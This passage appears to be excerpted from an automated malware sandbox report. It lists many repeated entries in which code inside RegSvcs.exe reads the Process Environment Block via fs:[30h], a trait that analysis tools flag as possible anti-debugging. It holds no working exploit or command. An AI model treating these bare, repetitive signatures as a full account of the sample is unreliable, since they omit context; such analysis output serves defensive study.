                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0158E420 mov eax, dword ptr fs:[00000030h]15_2_0158E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0158E420 mov eax, dword ptr fs:[00000030h]15_2_0158E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0158C427 mov eax, dword ptr fs:[00000030h]15_2_0158C427
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015904E5 mov ecx, dword ptr fs:[00000030h]15_2_015904E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0161A4B0 mov eax, dword ptr fs:[00000030h]15_2_0161A4B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015C44B0 mov ecx, dword ptr fs:[00000030h]15_2_015C44B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015964AB mov eax, dword ptr fs:[00000030h]15_2_015964AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01590750 mov eax, dword ptr fs:[00000030h]15_2_01590750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D2750 mov eax, dword ptr fs:[00000030h]15_2_015D2750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D2750 mov eax, dword ptr fs:[00000030h]15_2_015D2750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015C674D mov esi, dword ptr fs:[00000030h]15_2_015C674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015C674D mov eax, dword ptr fs:[00000030h]15_2_015C674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015C674D mov eax, dword ptr fs:[00000030h]15_2_015C674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01598770 mov eax, dword ptr fs:[00000030h]15_2_01598770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A0770 mov eax, dword ptr fs:[00000030h]15_2_015A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A0770 mov eax, dword ptr fs:[00000030h]15_2_015A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A0770 mov eax, dword ptr fs:[00000030h]15_2_015A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A0770 mov eax, dword ptr fs:[00000030h]15_2_015A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A0770 mov eax, dword ptr fs:[00000030h]15_2_015A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A0770 mov eax, dword ptr fs:[00000030h]15_2_015A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A0770 mov eax, dword ptr fs:[00000030h]15_2_015A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A0770 mov eax, dword ptr fs:[00000030h]15_2_015A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A0770 mov eax, dword ptr fs:[00000030h]15_2_015A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A0770 mov eax, dword ptr fs:[00000030h]15_2_015A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A0770 mov eax, dword ptr fs:[00000030h]15_2_015A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A0770 mov eax, dword ptr fs:[00000030h]15_2_015A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01614755 mov eax, dword ptr fs:[00000030h]15_2_01614755
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0161E75D mov eax, dword ptr fs:[00000030h]15_2_0161E75D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01590710 mov eax, dword ptr fs:[00000030h]15_2_01590710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015C0710 mov eax, dword ptr fs:[00000030h]15_2_015C0710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0160C730 mov eax, dword ptr fs:[00000030h]15_2_0160C730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CC700 mov eax, dword ptr fs:[00000030h]15_2_015CC700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015C273C mov eax, dword ptr fs:[00000030h]15_2_015C273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015C273C mov ecx, dword ptr fs:[00000030h]15_2_015C273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015C273C mov eax, dword ptr fs:[00000030h]15_2_015C273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CC720 mov eax, dword ptr fs:[00000030h]15_2_015CC720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CC720 mov eax, dword ptr fs:[00000030h]15_2_015CC720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0161E7E1 mov eax, dword ptr fs:[00000030h]15_2_0161E7E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159C7C0 mov eax, dword ptr fs:[00000030h]15_2_0159C7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016107C3 mov eax, dword ptr fs:[00000030h]15_2_016107C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015947FB mov eax, dword ptr fs:[00000030h]15_2_015947FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015947FB mov eax, dword ptr fs:[00000030h]15_2_015947FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015B27ED mov eax, dword ptr fs:[00000030h]15_2_015B27ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015B27ED mov eax, dword ptr fs:[00000030h]15_2_015B27ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015B27ED mov eax, dword ptr fs:[00000030h]15_2_015B27ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016447A0 mov eax, dword ptr fs:[00000030h]15_2_016447A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0163678E mov eax, dword ptr fs:[00000030h]15_2_0163678E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015907AF mov eax, dword ptr fs:[00000030h]15_2_015907AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0165866E mov eax, dword ptr fs:[00000030h]15_2_0165866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0165866E mov eax, dword ptr fs:[00000030h]15_2_0165866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015AC640 mov eax, dword ptr fs:[00000030h]15_2_015AC640
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015C2674 mov eax, dword ptr fs:[00000030h]15_2_015C2674
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CA660 mov eax, dword ptr fs:[00000030h]15_2_015CA660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CA660 mov eax, dword ptr fs:[00000030h]15_2_015CA660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D2619 mov eax, dword ptr fs:[00000030h]15_2_015D2619
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A260B mov eax, dword ptr fs:[00000030h]15_2_015A260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A260B mov eax, dword ptr fs:[00000030h]15_2_015A260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A260B mov eax, dword ptr fs:[00000030h]15_2_015A260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A260B mov eax, dword ptr fs:[00000030h]15_2_015A260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A260B mov eax, dword ptr fs:[00000030h]15_2_015A260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A260B mov eax, dword ptr fs:[00000030h]15_2_015A260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A260B mov eax, dword ptr fs:[00000030h]15_2_015A260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0160E609 mov eax, dword ptr fs:[00000030h]15_2_0160E609
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159262C mov eax, dword ptr fs:[00000030h]15_2_0159262C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015C6620 mov eax, dword ptr fs:[00000030h]15_2_015C6620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015C8620 mov eax, dword ptr fs:[00000030h]15_2_015C8620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015AE627 mov eax, dword ptr fs:[00000030h]15_2_015AE627
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016106F1 mov eax, dword ptr fs:[00000030h]15_2_016106F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016106F1 mov eax, dword ptr fs:[00000030h]15_2_016106F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0160E6F2 mov eax, dword ptr fs:[00000030h]15_2_0160E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0160E6F2 mov eax, dword ptr fs:[00000030h]15_2_0160E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0160E6F2 mov eax, dword ptr fs:[00000030h]15_2_0160E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0160E6F2 mov eax, dword ptr fs:[00000030h]15_2_0160E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CA6C7 mov ebx, dword ptr fs:[00000030h]15_2_015CA6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CA6C7 mov eax, dword ptr fs:[00000030h]15_2_015CA6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01594690 mov eax, dword ptr fs:[00000030h]15_2_01594690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01594690 mov eax, dword ptr fs:[00000030h]15_2_01594690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015C66B0 mov eax, dword ptr fs:[00000030h]15_2_015C66B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CC6A6 mov eax, dword ptr fs:[00000030h]15_2_015CC6A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01634978 mov eax, dword ptr fs:[00000030h]15_2_01634978
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01634978 mov eax, dword ptr fs:[00000030h]15_2_01634978
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0161C97C mov eax, dword ptr fs:[00000030h]15_2_0161C97C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01610946 mov eax, dword ptr fs:[00000030h]15_2_01610946
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D096E mov eax, dword ptr fs:[00000030h]15_2_015D096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D096E mov edx, dword ptr fs:[00000030h]15_2_015D096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D096E mov eax, dword ptr fs:[00000030h]15_2_015D096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015B6962 mov eax, dword ptr fs:[00000030h]15_2_015B6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015B6962 mov eax, dword ptr fs:[00000030h]15_2_015B6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015B6962 mov eax, dword ptr fs:[00000030h]15_2_015B6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01588918 mov eax, dword ptr fs:[00000030h]15_2_01588918
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01588918 mov eax, dword ptr fs:[00000030h]15_2_01588918
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0162892B mov eax, dword ptr fs:[00000030h]15_2_0162892B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0161892A mov eax, dword ptr fs:[00000030h]15_2_0161892A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0160E908 mov eax, dword ptr fs:[00000030h]15_2_0160E908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0160E908 mov eax, dword ptr fs:[00000030h]15_2_0160E908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0161C912 mov eax, dword ptr fs:[00000030h]15_2_0161C912
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0161E9E0 mov eax, dword ptr fs:[00000030h]15_2_0161E9E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159A9D0 mov eax, dword ptr fs:[00000030h]15_2_0159A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159A9D0 mov eax, dword ptr fs:[00000030h]15_2_0159A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159A9D0 mov eax, dword ptr fs:[00000030h]15_2_0159A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159A9D0 mov eax, dword ptr fs:[00000030h]15_2_0159A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159A9D0 mov eax, dword ptr fs:[00000030h]15_2_0159A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159A9D0 mov eax, dword ptr fs:[00000030h]15_2_0159A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015C49D0 mov eax, dword ptr fs:[00000030h]15_2_015C49D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016269C0 mov eax, dword ptr fs:[00000030h]15_2_016269C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015C29F9 mov eax, dword ptr fs:[00000030h]15_2_015C29F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015C29F9 mov eax, dword ptr fs:[00000030h]15_2_015C29F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0165A9D3 mov eax, dword ptr fs:[00000030h]15_2_0165A9D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016189B3 mov esi, dword ptr fs:[00000030h]15_2_016189B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016189B3 mov eax, dword ptr fs:[00000030h]15_2_016189B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016189B3 mov eax, dword ptr fs:[00000030h]15_2_016189B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015909AD mov eax, dword ptr fs:[00000030h]15_2_015909AD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015909AD mov eax, dword ptr fs:[00000030h]15_2_015909AD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A29A0 mov eax, dword ptr fs:[00000030h]15_2_015A29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A29A0 mov eax, dword ptr fs:[00000030h]15_2_015A29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A29A0 mov eax, dword ptr fs:[00000030h]15_2_015A29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A29A0 mov eax, dword ptr fs:[00000030h]15_2_015A29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A29A0 mov eax, dword ptr fs:[00000030h]15_2_015A29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A29A0 mov eax, dword ptr fs:[00000030h]15_2_015A29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A29A0 mov eax, dword ptr fs:[00000030h]15_2_015A29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A29A0 mov eax, dword ptr fs:[00000030h]15_2_015A29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A29A0 mov eax, dword ptr fs:[00000030h]15_2_015A29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A29A0 mov eax, dword ptr fs:[00000030h]15_2_015A29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A29A0 mov eax, dword ptr fs:[00000030h]15_2_015A29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A29A0 mov eax, dword ptr fs:[00000030h]15_2_015A29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A29A0 mov eax, dword ptr fs:[00000030h]15_2_015A29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01594859 mov eax, dword ptr fs:[00000030h]15_2_01594859
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01594859 mov eax, dword ptr fs:[00000030h]15_2_01594859
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015C0854 mov eax, dword ptr fs:[00000030h]15_2_015C0854
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01626870 mov eax, dword ptr fs:[00000030h]15_2_01626870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01626870 mov eax, dword ptr fs:[00000030h]15_2_01626870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0161E872 mov eax, dword ptr fs:[00000030h]15_2_0161E872
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0161E872 mov eax, dword ptr fs:[00000030h]15_2_0161E872
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A2840 mov ecx, dword ptr fs:[00000030h]15_2_015A2840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0163483A mov eax, dword ptr fs:[00000030h]15_2_0163483A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0163483A mov eax, dword ptr fs:[00000030h]15_2_0163483A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CA830 mov eax, dword ptr fs:[00000030h]15_2_015CA830
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015B2835 mov eax, dword ptr fs:[00000030h]15_2_015B2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015B2835 mov eax, dword ptr fs:[00000030h]15_2_015B2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015B2835 mov eax, dword ptr fs:[00000030h]15_2_015B2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015B2835 mov ecx, dword ptr fs:[00000030h]15_2_015B2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015B2835 mov eax, dword ptr fs:[00000030h]15_2_015B2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015B2835 mov eax, dword ptr fs:[00000030h]15_2_015B2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0161C810 mov eax, dword ptr fs:[00000030h]15_2_0161C810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0165A8E4 mov eax, dword ptr fs:[00000030h]15_2_0165A8E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015BE8C0 mov eax, dword ptr fs:[00000030h]15_2_015BE8C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CC8F9 mov eax, dword ptr fs:[00000030h]15_2_015CC8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CC8F9 mov eax, dword ptr fs:[00000030h]15_2_015CC8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01590887 mov eax, dword ptr fs:[00000030h]15_2_01590887
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0161C89D mov eax, dword ptr fs:[00000030h]15_2_0161C89D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01638B42 mov eax, dword ptr fs:[00000030h]15_2_01638B42
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01626B40 mov eax, dword ptr fs:[00000030h]15_2_01626B40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01626B40 mov eax, dword ptr fs:[00000030h]15_2_01626B40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0165AB40 mov eax, dword ptr fs:[00000030h]15_2_0165AB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0158CB7E mov eax, dword ptr fs:[00000030h]15_2_0158CB7E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01644B4B mov eax, dword ptr fs:[00000030h]15_2_01644B4B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01644B4B mov eax, dword ptr fs:[00000030h]15_2_01644B4B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0163EB50 mov eax, dword ptr fs:[00000030h]15_2_0163EB50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01658B28 mov eax, dword ptr fs:[00000030h]15_2_01658B28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01658B28 mov eax, dword ptr fs:[00000030h]15_2_01658B28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015BEB20 mov eax, dword ptr fs:[00000030h]15_2_015BEB20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015BEB20 mov eax, dword ptr fs:[00000030h]15_2_015BEB20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0160EB1D mov eax, dword ptr fs:[00000030h]15_2_0160EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0160EB1D mov eax, dword ptr fs:[00000030h]15_2_0160EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0160EB1D mov eax, dword ptr fs:[00000030h]15_2_0160EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0160EB1D mov eax, dword ptr fs:[00000030h]15_2_0160EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0160EB1D mov eax, dword ptr fs:[00000030h]15_2_0160EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0160EB1D mov eax, dword ptr fs:[00000030h]15_2_0160EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0160EB1D mov eax, dword ptr fs:[00000030h]15_2_0160EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0160EB1D mov eax, dword ptr fs:[00000030h]15_2_0160EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0160EB1D mov eax, dword ptr fs:[00000030h]15_2_0160EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015B0BCB mov eax, dword ptr fs:[00000030h]15_2_015B0BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015B0BCB mov eax, dword ptr fs:[00000030h]15_2_015B0BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015B0BCB mov eax, dword ptr fs:[00000030h]15_2_015B0BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0161CBF0 mov eax, dword ptr fs:[00000030h]15_2_0161CBF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01590BCD mov eax, dword ptr fs:[00000030h]15_2_01590BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01590BCD mov eax, dword ptr fs:[00000030h]15_2_01590BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01590BCD mov eax, dword ptr fs:[00000030h]15_2_01590BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015BEBFC mov eax, dword ptr fs:[00000030h]15_2_015BEBFC
